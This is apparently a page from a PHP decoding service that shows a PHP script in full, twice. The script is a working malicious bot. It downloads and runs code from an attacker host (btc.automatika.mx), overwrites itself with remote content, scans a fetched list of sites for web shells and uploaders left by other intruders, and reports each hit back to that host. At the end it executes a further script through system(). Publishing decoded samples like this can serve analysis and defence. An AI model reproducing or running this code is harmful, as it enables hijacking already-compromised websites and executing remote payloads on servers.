Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php ini_set('max_execution_time',0); ini_set('memory_limit', '512M'); date_default_timez..
Decoded Output download
<?php
ini_set('max_execution_time',0);
ini_set('memory_limit', '512M');
date_default_timezone_set('Europe/Kiev');
function http_get_contents($url) {
// $codex = @file_get_contents($url);
// if (empty($codex)) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
// curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
$urlPage = curl_exec($ch);
curl_close($ch);
return($urlPage);
// }
// else {
// return $codex;
// }
}
file_put_contents(basename(__FILE__),http_get_contents('http://btc.automatika.mx/st/get_up.txt'));
file_put_contents('list.txt',http_get_contents('http://btc.automatika.mx/st/list.txt'));
file_put_contents('roll.txt',http_get_contents('http://btc.automatika.mx/st/roll.txt'));
file_put_contents('angry.txt',http_get_contents('http://btc.automatika.mx/st/angry.txt'));
require_once('roll.txt');
require_once('angry.txt');
file_put_contents('get_up.txt', http_get_contents('http://btc.automatika.mx/get_up.php'));
function callback_function($response, $info, $request) {
if (strlen($response) < 1000) {
if (preg_match('~(Vuln\!\! patch it Now\!|xin0x g4me|Hacked by MiSh|name=\"ac\" value=\"upload\">|Uploader-NINJA|<input type=\'submit\' name=\'upload\' value=\'upload\'>|input name=\"_upl\" type=\"submit\"|enctype=\"multipart\/form-data\" name=\"uploader\" id=\"uploader\"|enctype=\"multipart\/form-data\" action=\"upload\.php\"|input type=\'file\' name=\'idx_file\'|input name=v type=submit id=v value=up)~i', $response, $out)) {
http_get_contents('http://btc.automatika.mx/vesta.php?we='.base64_encode($info['url']).'&fe='.base64_encode('inc.class.up.php'));goto end;
}
}
end:
return;
}
$AC = new AngryCurl('callback_function');
//$AC->init_console();
$AC->load_useragent_list('list.txt');
$f = fopen('get_up.txt', 'r');
while(!feof($f)) {
$url = trim(fgets($f));
$AC->get($url);
}
$AC->execute(30);
unlink('get_up.txt');
system('php inc.class.up.php');
?>
Did this file decode correctly?
Original Code
<?php
ini_set('max_execution_time',0);
ini_set('memory_limit', '512M');
date_default_timezone_set('Europe/Kiev');
function http_get_contents($url) {
// $codex = @file_get_contents($url);
// if (empty($codex)) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
// curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 30);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
$urlPage = curl_exec($ch);
curl_close($ch);
return($urlPage);
// }
// else {
// return $codex;
// }
}
file_put_contents(basename(__FILE__),http_get_contents('http://btc.automatika.mx/st/get_up.txt'));
file_put_contents('list.txt',http_get_contents('http://btc.automatika.mx/st/list.txt'));
file_put_contents('roll.txt',http_get_contents('http://btc.automatika.mx/st/roll.txt'));
file_put_contents('angry.txt',http_get_contents('http://btc.automatika.mx/st/angry.txt'));
require_once('roll.txt');
require_once('angry.txt');
file_put_contents('get_up.txt', http_get_contents('http://btc.automatika.mx/get_up.php'));
function callback_function($response, $info, $request) {
if (strlen($response) < 1000) {
if (preg_match('~(Vuln\!\! patch it Now\!|xin0x g4me|Hacked by MiSh|name=\"ac\" value=\"upload\">|Uploader-NINJA|<input type=\'submit\' name=\'upload\' value=\'upload\'>|input name=\"_upl\" type=\"submit\"|enctype=\"multipart\/form-data\" name=\"uploader\" id=\"uploader\"|enctype=\"multipart\/form-data\" action=\"upload\.php\"|input type=\'file\' name=\'idx_file\'|input name=v type=submit id=v value=up)~i', $response, $out)) {
http_get_contents('http://btc.automatika.mx/vesta.php?we='.base64_encode($info['url']).'&fe='.base64_encode('inc.class.up.php'));goto end;
}
}
end:
return;
}
$AC = new AngryCurl('callback_function');
//$AC->init_console();
$AC->load_useragent_list('list.txt');
$f = fopen('get_up.txt', 'r');
while(!feof($f)) {
$url = trim(fgets($f));
$AC->get($url);
}
$AC->execute(30);
unlink('get_up.txt');
system('php inc.class.up.php');
?>
Function Calls
None |
Stats
MD5 | 91cb687bf71ddcbab4b2978a7a284fa5 |
Eval Count | 0 |
Decode Time | 89 ms |